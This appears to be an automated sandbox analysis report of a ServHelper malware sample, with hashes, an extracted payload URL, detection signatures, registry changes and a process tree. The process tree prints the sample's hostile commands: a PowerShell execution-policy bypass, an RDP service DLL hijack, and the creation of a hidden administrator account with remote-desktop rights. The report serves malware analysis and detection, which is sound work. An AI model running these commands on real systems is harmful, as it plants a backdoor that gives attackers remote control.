Analysis
-
max time kernel
48s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
11-08-2021 07:36
Static task
static1
Behavioral task
behavioral1
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win10v20210410
General
-
Target
bfe0ac25eeeb759f7c8e06229c7313a2.exe
-
Size
5.9MB
-
MD5
bfe0ac25eeeb759f7c8e06229c7313a2
-
SHA1
199c1fbd29f9ec98b83464763dac63ef80998bb3
-
SHA256
be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
-
SHA512
a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 2824 powershell.exe 19 2824 powershell.exe 20 2824 powershell.exe 21 2824 powershell.exe 23 2824 powershell.exe 25 2824 powershell.exe 27 2824 powershell.exe 29 2824 powershell.exe 31 2824 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2876 2876 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F2D.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4hlykntf.ztb.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F4D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F6F.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vfb1nfhh.oxx.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F5E.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F6E.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe 428 powershell.exe 428 powershell.exe 428 powershell.exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 2912 powershell.exe 2912 powershell.exe 2912 powershell.exe 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1808 bfe0ac25eeeb759f7c8e06229c7313a2.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 428 powershell.exe Token: SeIncreaseQuotaPrivilege 428 powershell.exe Token: SeSecurityPrivilege 428 powershell.exe Token: SeTakeOwnershipPrivilege 428 powershell.exe Token: SeLoadDriverPrivilege 428 powershell.exe Token: SeSystemProfilePrivilege 428 powershell.exe Token: SeSystemtimePrivilege 428 powershell.exe Token: SeProfSingleProcessPrivilege 428 powershell.exe Token: SeIncBasePriorityPrivilege 428 powershell.exe Token: SeCreatePagefilePrivilege 428 powershell.exe Token: SeBackupPrivilege 428 powershell.exe Token: SeRestorePrivilege 428 powershell.exe Token: SeShutdownPrivilege 428 powershell.exe Token: SeDebugPrivilege 428 powershell.exe Token: SeSystemEnvironmentPrivilege 428 powershell.exe Token: SeRemoteShutdownPrivilege 428 powershell.exe Token: SeUndockPrivilege 428 powershell.exe Token: SeManageVolumePrivilege 428 powershell.exe Token: 33 428 powershell.exe Token: 34 428 powershell.exe Token: 35 428 powershell.exe Token: 36 428 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeIncreaseQuotaPrivilege 1988 powershell.exe Token: SeSecurityPrivilege 1988 powershell.exe Token: SeTakeOwnershipPrivilege 1988 powershell.exe Token: SeLoadDriverPrivilege 1988 powershell.exe Token: SeSystemProfilePrivilege 1988 powershell.exe Token: SeSystemtimePrivilege 1988 powershell.exe Token: SeProfSingleProcessPrivilege 1988 powershell.exe Token: SeIncBasePriorityPrivilege 1988 powershell.exe Token: SeCreatePagefilePrivilege 1988 powershell.exe Token: SeBackupPrivilege 1988 powershell.exe Token: SeRestorePrivilege 1988 powershell.exe Token: SeShutdownPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeSystemEnvironmentPrivilege 1988 powershell.exe Token: SeRemoteShutdownPrivilege 1988 powershell.exe Token: SeUndockPrivilege 1988 powershell.exe Token: SeManageVolumePrivilege 1988 powershell.exe Token: 33 1988 powershell.exe Token: 34 1988 powershell.exe Token: 35 1988 powershell.exe Token: 36 1988 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeIncreaseQuotaPrivilege 2912 powershell.exe Token: SeSecurityPrivilege 2912 powershell.exe Token: SeTakeOwnershipPrivilege 2912 powershell.exe Token: SeLoadDriverPrivilege 2912 powershell.exe Token: SeSystemProfilePrivilege 2912 powershell.exe Token: SeSystemtimePrivilege 2912 powershell.exe Token: SeProfSingleProcessPrivilege 2912 powershell.exe Token: SeIncBasePriorityPrivilege 2912 powershell.exe Token: SeCreatePagefilePrivilege 2912 powershell.exe Token: SeBackupPrivilege 2912 powershell.exe Token: SeRestorePrivilege 2912 powershell.exe Token: SeShutdownPrivilege 2912 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeSystemEnvironmentPrivilege 2912 powershell.exe Token: SeRemoteShutdownPrivilege 2912 powershell.exe Token: SeUndockPrivilege 2912 powershell.exe Token: SeManageVolumePrivilege 2912 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 1808 wrote to memory of 2732 1808 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 1808 wrote to memory of 2732 1808 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 2732 wrote to memory of 736 2732 powershell.exe csc.exe PID 2732 wrote to memory of 736 2732 powershell.exe csc.exe PID 736 wrote to memory of 3328 736 csc.exe cvtres.exe PID 736 wrote to memory of 3328 736 csc.exe cvtres.exe PID 2732 wrote to memory of 428 2732 powershell.exe powershell.exe PID 2732 wrote to memory of 428 2732 powershell.exe powershell.exe PID 2732 wrote to memory of 1988 2732 powershell.exe powershell.exe PID 2732 wrote to memory of 1988 2732 powershell.exe powershell.exe PID 2732 wrote to memory of 2912 2732 powershell.exe powershell.exe PID 2732 wrote to memory of 2912 2732 powershell.exe powershell.exe PID 2732 wrote to memory of 3388 2732 powershell.exe reg.exe PID 2732 wrote to memory of 3388 2732 powershell.exe reg.exe PID 2732 wrote to memory of 736 2732 powershell.exe reg.exe PID 2732 wrote to memory of 736 2732 powershell.exe reg.exe PID 2732 wrote to memory of 208 2732 powershell.exe reg.exe PID 2732 wrote to memory of 208 2732 powershell.exe reg.exe PID 2732 wrote to memory of 3356 2732 powershell.exe net.exe PID 2732 wrote to memory of 3356 2732 powershell.exe net.exe PID 3356 wrote to memory of 1968 3356 net.exe net1.exe PID 3356 wrote to memory of 1968 3356 net.exe net1.exe PID 2732 wrote to memory of 2132 2732 powershell.exe cmd.exe PID 2732 wrote to memory of 2132 2732 powershell.exe cmd.exe PID 2132 wrote to memory of 736 2132 cmd.exe cmd.exe PID 2132 wrote to memory of 736 2132 cmd.exe cmd.exe PID 736 wrote to memory of 3388 736 cmd.exe net.exe PID 736 wrote to memory of 3388 736 cmd.exe net.exe PID 3388 wrote to memory of 2032 3388 net.exe net1.exe PID 3388 wrote to memory of 2032 3388 net.exe net1.exe PID 2732 wrote to memory of 2488 2732 powershell.exe cmd.exe PID 2732 wrote to memory of 2488 2732 powershell.exe cmd.exe PID 2488 wrote to memory of 2912 2488 cmd.exe cmd.exe PID 2488 wrote to memory of 2912 2488 cmd.exe cmd.exe PID 2912 wrote to memory of 492 2912 cmd.exe net.exe PID 2912 wrote to memory of 492 2912 cmd.exe net.exe PID 492 wrote to memory of 684 492 net.exe net1.exe PID 492 wrote to memory of 684 492 net.exe net1.exe PID 3948 wrote to memory of 1132 3948 cmd.exe net.exe PID 3948 wrote to memory of 1132 3948 cmd.exe net.exe PID 1132 wrote to memory of 3772 1132 net.exe net1.exe PID 1132 wrote to memory of 3772 1132 net.exe net1.exe PID 2784 wrote to memory of 1968 2784 cmd.exe net.exe PID 2784 wrote to memory of 1968 2784 cmd.exe net.exe PID 1968 wrote to memory of 1684 1968 net.exe net1.exe PID 1968 wrote to memory of 1684 1968 net.exe net1.exe PID 3116 wrote to memory of 3948 3116 cmd.exe net.exe PID 3116 wrote to memory of 3948 3116 cmd.exe net.exe PID 3948 wrote to memory of 1292 3948 net.exe net1.exe PID 3948 wrote to memory of 1292 3948 net.exe net1.exe PID 1280 wrote to memory of 2132 1280 cmd.exe net.exe PID 1280 wrote to memory of 2132 1280 cmd.exe net.exe PID 2132 wrote to memory of 2824 2132 net.exe net1.exe PID 2132 wrote to memory of 2824 2132 net.exe net1.exe PID 3864 wrote to memory of 2116 3864 cmd.exe net.exe PID 3864 wrote to memory of 2116 3864 cmd.exe net.exe PID 2116 wrote to memory of 3880 2116 net.exe net1.exe PID 2116 wrote to memory of 3880 2116 net.exe net1.exe PID 1132 wrote to memory of 748 1132 cmd.exe net.exe PID 1132 wrote to memory of 748 1132 cmd.exe net.exe PID 748 wrote to memory of 3936 748 net.exe net1.exe PID 748 wrote to memory of 3936 748 net.exe net1.exe PID 1292 wrote to memory of 3956 1292 cmd.exe WMIC.exe PID 1292 wrote to memory of 3956 1292 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4dpkxhkc\4dpkxhkc.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2938.tmp" "c:\Users\Admin\AppData\Local\Temp\4dpkxhkc\CSC566D3070E6FA445095B09EA7D51A1EB8.TMP"4⤵PID:3328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3388
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:736 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:208
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1968
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2032
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:684
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4472
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4488
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3772
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc pz7fz8AV /add1⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc pz7fz8AV /add2⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc pz7fz8AV /add3⤵PID:1684
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1292
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:2824
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3880
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc pz7fz8AV1⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc pz7fz8AV2⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc pz7fz8AV3⤵PID:3936
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:3956
-
